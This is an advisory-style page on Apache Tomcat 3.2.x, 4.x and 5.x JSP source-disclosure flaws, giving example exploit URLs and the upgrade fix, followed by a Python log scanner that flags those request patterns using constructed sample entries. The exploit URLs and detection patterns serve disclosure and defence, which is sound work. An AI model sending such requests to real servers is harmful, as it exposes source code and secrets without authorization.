Try to get the source
Vulnerable Systems:
* Apache Software Foundation Tomcat 3.2.4
* Apache Software Foundation Tomcat 3.2.3
Examples:
http://example.com:80/examples/jsp/source.jsp??
http://example.com:80/examples/jsp/source.jsp?/jsp/
Reference: http://www.securityfocus.com/bid/4876/exploit
Apache Software Foundation Tomcat 4.X
[SECURITY] Apache Tomcat 4.x JSP source disclosure vulnerability
2. Details
Let's say you have a valid URL like
http://my.site/login.jsp
then a URL like
http://my.site/servlet/org.apache.catalina.servlets.DefaultServlet/login.jsp
will give you the source code of the JSP page. The full syntax of the exposure URL is:
http://{server}[:port]/[Context/]servlet/org.apache.catalina.servlets.DefaultServlet/[context_relative_path/]file_name.jsp
For example, to see the JSP source of the Tomcat 4.1.10 admin application page
http://localhost:8080/admin/index.jsp
request
http://localhost:8080/admin/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
Reference: http://marc.theaimsgroup.com/?l=tomcat-user&m=103417249925541&w=2
Vulnerable Systems:
* Apache Tomcat version 5.0.28
* Apache Tomcat version 5.5.12
* Apache Tomcat version 5.5.9
* Apache Tomcat version 5.5.7
Immune Systems:
* Apache Tomcat version 5.5.17
Examples:
The following URLs will trigger the vulnerability:
http://www.sitexyz.com/;index.jsp
http://www.sitexyz.com/help/;help.do
Solution:
Upgrade to the latest stable Tomcat release. Confirmed fix is available in Apache Tomcat version 5.5.17.
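For anyone checking whether these requests ever reached their servers, the following is an added example (not code from the original post or from the Tomcat project) that scans Common Log Format access-log lines for the three disclosure patterns shown on this page: the Tomcat 3.2.x source.jsp query, the Tomcat 4.x DefaultServlet invoker path, and the Tomcat 5.x "/;file.jsp" path-parameter form. The sample log lines are constructed; the vector names are my own labels.

```python
import re
from urllib.parse import urlsplit, unquote

# Request-path signatures for the three disclosure vectors described on this page.
VECTORS = [
    ("tomcat3-source.jsp", re.compile(r"/examples/jsp/source\.jsp$", re.I)),
    ("tomcat4-defaultservlet",
     re.compile(r"/servlet/org\.apache\.catalina\.servlets\.DefaultServlet/.+\.jsp$", re.I)),
    ("tomcat5-path-param", re.compile(r"/;[^/]*\.(?:jsp|do)$", re.I)),
]

# Common Log Format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2006:10:00:01 +0000] "GET /admin/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp HTTP/1.0" 200 1234',
    '10.0.0.5 - - [12/Mar/2006:10:00:02 +0000] "GET /;index.jsp HTTP/1.0" 200 987',
    '10.0.0.5 - - [12/Mar/2006:10:00:03 +0000] "GET /help/;help.do HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Mar/2006:10:00:04 +0000] "GET /examples/jsp/source.jsp?/jsp/ HTTP/1.0" 200 2048',
    '10.0.0.9 - - [12/Mar/2006:10:00:05 +0000] "GET /login.jsp;jsessionid=ABC HTTP/1.1" 200 3000',
    '10.0.0.9 - - [12/Mar/2006:10:00:06 +0000] "GET /index.jsp HTTP/1.1" 200 3000',
]


def classify_target(target):
    """Return the vector name if the request target matches a disclosure pattern, else None."""
    parts = urlsplit(target)            # urlsplit keeps ';' path parameters in .path
    path = unquote(parts.path)          # decode %-escapes before matching
    for name, pattern in VECTORS:
        if not pattern.search(path):
            continue
        # source.jsp is a normal example page; only a request carrying a query string
        # (e.g. '??' or '?/jsp/') asks it to print a file, so a bare hit is not flagged.
        if name == "tomcat3-source.jsp" and "?" not in target:
            continue
        return name
    return None


def scan_log(lines):
    """Return (client, target, status, vector) for every log line that matches a vector."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                    # skip lines that are not Common Log Format
        vector = classify_target(m.group("target"))
        if vector:
            hits.append((m.group("client"), m.group("target"), m.group("status"), vector))
    return hits


if __name__ == "__main__":
    for client, target, status, vector in scan_log(SAMPLE_LOG):
        print(f"{client} {status} {vector}: {target}")
```

A 200 status on a flagged line is the case worth investigating, since it means the server answered the request rather than rejecting it.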